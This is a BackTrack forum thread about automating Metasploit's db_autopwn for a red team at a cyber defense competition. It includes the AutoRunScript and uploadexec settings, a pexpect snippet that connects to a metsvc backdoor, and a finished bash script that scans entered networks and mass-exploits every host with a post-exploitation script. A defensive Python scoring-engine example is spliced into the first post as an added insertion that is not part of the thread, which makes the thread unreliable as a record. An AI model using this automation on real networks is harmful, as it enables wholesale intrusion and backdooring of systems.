Thread: db_autopwn post exploitation

  1. #1
    Just burned his ISO
    Join Date: Nov 2009
    Posts: 3

    I have a query on the db_autopwn function of Metasploit. For the past 2 years I have been participating in the Collegiate Cyber Defense Competition. It is comprised of two teams, the white teams and the red team. White team works on defense and red team is on offense. The problem we have had the past 2 years is there is only 1 red team (me and 3 other guys) and 6+ white teams.

    Basically we show up on the competition day and allow the white teams 1 hour to secure their networks. Each white team has 5+ servers with known vulnerabilities and misconfigurations like a blank sa password. We developed a custom application that monitors the uptime and availability of all the white team services and automatically scores them based on those factors. It also checks that files don't change (like when we change the files in the ftp or www roots). So if a team gets compromised and services are affected they start losing points. The team with the most points at the end of the day wins.

    Now the issue we have had is we are manually attacking each system one by one. So some teams are unfairly attacked more, or just more time is being spent on them. Thus some teams are getting slammed all day while others are barely being attacked. My idea is to perform a full Nessus or OpenVAS scan during the first hour while they are securing their systems. After that I will import this into db_autopwn and automatically exploit the 30+ systems. The problem is I need to plant a backdoor on the system so the other red team members can connect quickly and start going after services. Obviously it would take a long time to do this manually on each machine. So ideally I would like to run db_autopwn, but somehow specify a meterpreter script to automatically run after successfully exploiting each host. I would like to upload 2 files via meterpreter and then execute them or automatically run the new metsrvc.rb script.

    Do you know of any way to achieve this?

    Thank you for your time

    Josh

    No one has any idea on this??

    Automating a post db_autopwn task?
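
The scoring engine the first post describes (service availability plus a check that files in the www/ftp roots don't change) is the white-team side of this thread. The following is an added example of that mechanism, not the competition's own scoring application: it hashes a baseline of a directory, re-hashes it each round, probes each scored service with a TCP connect, and turns the result into points. The directory contents, the port numbers and the point values are all constructed for the demo.

```python
import hashlib
import os
import socket
import tempfile
import threading


def build_baseline(root):
    """Map every file under root (relative path) to its SHA-256 digest."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            baseline[os.path.relpath(path, root)] = digest.hexdigest()
    return baseline


def diff_baseline(baseline, current):
    """Return (modified, added, removed) relative paths versus the baseline."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    return modified, added, removed


def service_up(host, port, timeout=1.0):
    """True if a TCP connection to host:port completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def score_round(baseline, root, services, service_points=10, file_penalty=5):
    """One scoring pass: points per reachable service, penalty per changed file."""
    modified, added, removed = diff_baseline(baseline, build_baseline(root))
    up = {"%s:%d" % (h, p): service_up(h, p) for h, p in services}
    score = service_points * sum(up.values())
    score -= file_penalty * (len(modified) + len(added) + len(removed))
    return {"score": score, "services": up,
            "modified": modified, "added": added, "removed": removed}


def demo():
    """Constructed scenario: a fake www root, one listening and one closed port,
    then a defaced page plus a dropped file. Returns (clean, tampered) results."""
    root = tempfile.mkdtemp()
    for name, body in (("index.html", "<h1>team web</h1>"), ("about.html", "about us")):
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    baseline = build_baseline(root)

    # Stand-in for a team service: a listener on an ephemeral localhost port
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    up_port = srv.getsockname()[1]
    stop = threading.Event()

    def accept_loop():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:  # includes the accept timeout
                continue

    worker = threading.Thread(target=accept_loop, daemon=True)
    worker.start()

    # A port that was bound and released, so nothing is listening on it
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    down_port = probe.getsockname()[1]
    probe.close()

    services = [("127.0.0.1", up_port), ("127.0.0.1", down_port)]
    clean = score_round(baseline, root, services)

    # Simulate the tampering the integrity check is meant to catch
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("defaced")
    with open(os.path.join(root, "dropped.txt"), "w") as fh:
        fh.write("unexpected file")
    tampered = score_round(baseline, root, services)

    stop.set()
    worker.join()
    srv.close()
    return clean, tampered


if __name__ == "__main__":
    for label, result in zip(("clean", "tampered"), demo()):
        print(label, result)
```

A real scorer would run `score_round` on a timer against each team's hosts and persist the baseline taken before the attack window opens; hashing the whole tree each round is fine for the small www/ftp roots a competition uses.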

  2. #2
    Super Moderator lupin
    Join Date: Jan 2010
    Posts: 2,943

    No bumping please, if someone can help you they will.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO, Track404
    Join Date: Nov 2009
    Posts: 23

    I think you can probably achieve this by altering the very same Python script that Fast-Track uses for its autopwn feature.

  4. #4
    Developer
    Join Date: Mar 2007
    Posts: 6,126

    You answered your own question. The way to do it is to write a custom Ruby script to complete the task you need. There are lots of them already included, so just grab one and hack away.

  5. #5
    Member imported_vvpalin
    Join Date: Apr 2009
    Posts: 442

    I know this is pretty bad to say ... but honestly how in the hell can you NOT know how to do this if you've been at this 2+ years ... I mean seriously!

    Not only that, but did you even read Metasploit Unleashed??

    set AutoRunScript /pentest/exploits/framework3/scripts/meterpreter/YOURCUSTOMSCRIPT.rb

    or better yet uploadexec.rb
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  6. #6
    Just burned his ISO, Track404
    Join Date: Nov 2009
    Posts: 23

    Just to clear things up, I offered my suggestion to the creator of this thread. I knew it was possible to do somehow by looking at other scripts for ideas.

  7. #7
    Just burned his ISO
    Join Date: Nov 2009
    Posts: 3

    Track404: Thank you for your response.

    Are you saying I should copy the Python script from Fast-Track into Metasploit??

    vvpalin: Sorry, I have not been working on this for 2 years straight. Just 1 week before the competition each year.
    Just to be clear, I can run:

    set AutoRunScript /pentest/exploits/framework3/scripts/meterpreter/YOURCUSTOMSCRIPT.rb

    and this will set the auto run script that db_autopwn will use??

    I know this will set the AutoRunScript when choosing a meterpreter payload, but did not know it was an option under db_autopwn.

    Is there any documentation on this?

    I have looked at Metasploit Unleashed, but see nothing about using this with db_autopwn.

    Also, do you know a way to simply automate 3-4 meterpreter commands??

    If I could have it automatically run a few upload commands followed by 1 execute command, that would work perfectly.

    I am talking about the built-in meterpreter upload and execute commands.

  8. #8
    Super Moderator Archangel-Amael
    Join Date: Jan 2010
    Location: Somewhere
    Posts: 8,012

    Use the edit button, do not make multiple consecutive posts.
    To be successful here you should read all of the following.
    Forum Rules
    Forum FAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  9. #9
    Just burned his ISO, Track404
    Join Date: Nov 2009
    Posts: 23

    Riverluck123:

    I could be wrong, but I suggested that you look at the script Fast-Track uses and alter it to fit your needs. For instance, if you had already compromised a computer with Metsvc and you wanted to easily connect to port 313337, then one way of doing it would be the following snip:

    import pexpect

    # Drive an interactive msfconsole through pexpect. The spawn and the prompt
    # wait are assumed here; the original snippet showed only the sendline calls.
    child1 = pexpect.spawn('msfconsole')
    child1.expect('msf >')
    # use exploit/multi/handler
    child1.sendline('use exploit/multi/handler')
    # set PAYLOAD windows/metsvc_bind_tcp
    child1.sendline('set PAYLOAD windows/metsvc_bind_tcp')
    # set LPORT 31337
    child1.sendline('set LPORT 31337')
    # set RHOST IP ADDRESS (placeholder left as in the original)
    child1.sendline('set RHOST IP ADDRESS')
    # run actual exploit
    child1.sendline('exploit')
    # hand the console back to the operator once the handler is running
    child1.interact()

    I think both vvpalin and Pureh@te provided you with enough information to accomplish your goal. As for me, I'm a newbie to all of this.

    Good luck

  10. #10
    Just burned his ISO
    Join Date: Nov 2009
    Posts: 3

    Thank you everyone for pointing me in the right direction.

    I was able to accomplish my goal. I made a very simple meterpreter script that uploaded the files I needed by means of the set autorunscript option.

    I then made a simple bash script to automate the thing even further. This enables me to enter the 4-5 networks at once and go. It needs a lot of work, but will do what I need. Thanks again.

    You would need to modify the set autorunscript part to your liking, but other than that it should be ready to go.

    Code:

    #!/bin/bash
    # Builds an msfconsole resource file (auto.rc) from the networks entered
    # interactively, then launches msfconsole with it.

    clear
    rm -f auto.rc
    touch auto.rc

    echo "######################################################"
    echo "######################################################"
    echo "#######     Welcome to the AutoPwn Script     ########"
    echo "######################################################"
    echo "######################################################"
    echo " "
    echo "############################"
    echo "### Creating Attack File ###"
    echo "############################"
    echo " "

    # Start from a fresh workspace database
    echo "db_destroy auto1" >> auto.rc
    echo "db_create auto1" >> auto.rc
    echo "db_connect auto1" >> auto.rc

    var1=0

    while [ "$var1" -ne 1 ]
    do
        echo "##################################################"
        echo "##### Enter the Network or IP address to attack! #"
        echo "##### Example: 192.168.1.1 or 192.168.1.1/24 #####"
        echo "##################################################"
        echo " "
        echo -n "IP / Network: "
        read ipa

        if [ -z "$ipa" ]
        then
            ipa="192.168.1.1/24"
            echo "No IP Entered, Default 192.168.1.1/24 used"
        else
            echo "IP or Network Added!"
        fi

        # One db_nmap line per network entered
        echo "db_nmap $ipa" >> auto.rc

        echo " "
        echo "##################################"
        echo "## Current Attack File Contents ##"
        echo "##################################"
        echo " "
        echo "############################"
        cat auto.rc
        echo "############################"
        echo " "

        echo "Do you want to enter another IP or Network? Enter 0 or 1:"
        echo "0) Yes Enter another IP or Network"
        echo "1) No Continue and launch attacks"
        echo -n "Selection: "
        read var1

        # Empty input means "enter another network"
        if [ -z "$var1" ]
        then
            var1=0
        fi
    done

    echo "db_hosts" >> auto.rc
    # Change this line to point at your own meterpreter script
    echo "set autorunscript getgui" >> auto.rc
    echo "db_autopwn -t -p -e -b" >> auto.rc

    echo "#######################"
    echo "###Launching Attacks###"
    echo "#######################"
    echo " "
    echo "Metasploit will now be launched"

    /pentest/exploits/framework3/msfconsole -r auto.rc
